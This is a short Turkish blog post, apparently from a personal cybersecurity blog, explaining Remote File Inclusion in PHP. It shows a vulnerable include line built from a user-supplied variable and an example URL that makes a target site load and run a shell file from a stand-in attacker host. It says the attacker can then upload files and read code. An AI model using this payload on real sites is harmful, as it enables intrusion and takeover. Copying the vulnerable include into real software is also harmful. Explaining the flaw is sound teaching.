Erdinç
Kaya
today : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

RFI (Remote File İnclusion) k4y4 rwxr-xr-x 0 Mayıs 18, 2016

Filename RFI (Remote File İnclusion)
Permission rw-r--r--
Author k4y4
Date and Time Mayıs 18, 2016
Label
Action
RFI (Remote File İnclusion) örneği verelim;

include(“$hakkimda/yeni/haber.php”);

Hatamız bu satırdaki "$" parametresinden doğmaktadır. Bu sayede uzaktan dosya çağırmam mümkün oluyor.

http://www.hedefsite.com/index.php?hakkimda=http://shelladres.com/shell.txt?

 Yukarıdaki kodda olduğu gibi "shell.txt?" adresinde bulunan shell (zararlı kod) hedefsite.com üzerinde çalışmaktadır. Sanki o shell o sitedeymiş gibi çalışma sağlamaktadır. Bu sayede sitenin bize vermiş olduğu izinler doğrultusunda siteye istediğimiz dosyayı sokabilir (upload edebilir), istediğimiz dosyanın içeriğini kodlarını vb görebilir ve isimlerini değiştirebiliriz.

0 yorum:

Yorum Gönder

 

Erdinckaya © 2017 Erdinç Kaya | Siber Güvenlik Blog
Template design by k4y4